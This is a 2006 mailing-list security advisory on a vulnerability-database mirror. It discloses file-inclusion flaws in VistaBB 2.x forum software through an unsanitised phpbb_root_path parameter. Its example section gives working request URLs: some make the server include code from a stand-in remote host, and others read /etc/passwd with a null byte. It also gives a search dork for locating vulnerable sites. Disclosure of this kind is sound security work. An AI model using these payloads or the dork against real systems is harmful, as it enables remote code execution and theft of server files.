Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14032
HistoryAug 24, 2006 - 12:00 a.m.

[Full-disclosure] Advisory: VistaBB <= 2.x Multiple File Inclusion Vulnerabilities

2006-08-2400:00:00
vulners.com
23
JSON

–Security Report–
Advisory: VistaBB <= 2.x Multiple File Inclusion Vulnerabilities

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 24/08/06 03:00 AM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: VistaBB (http://www.vistabb.net)
Version: 2.033 and prior versions must be affected.
About: Via this methods remote attacker can include arbitrary files to
VistaBB.Variable phpbb_root_path did not sanitized properly before using it
on includes/functions_mod_user.php and includes/functions_portal.php so
remote attacker can include internal and external files to VistaBB
For including internal files magic_quotes_gpc must be off on server settings
because remote attacker needs to use null char at the end of filename.
Eg: /etc/passwd%00
Level: Highly Critical

How&Example:
GET ->

http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=[FILE]
EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=http://yoursite.com/cmd.txt?
EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=/etc/passwd%00
<- mq off
GET ->

http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=[FILE]
EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=http://yoursite.com/cmd.txt?
EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=/etc/passwd%00
<- mq off

Timeline:

  • 24/08/2006: Vulnerability found.
  • 24/08/2006: Contacted with vendor and waiting reply

Exploit: http://www.nukedx.com/?getxpl=48

Original advisory can be found at: http://www.nukedx.com/?viewdoc=48

Dorks: "Powered by VistaBB"

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

JSON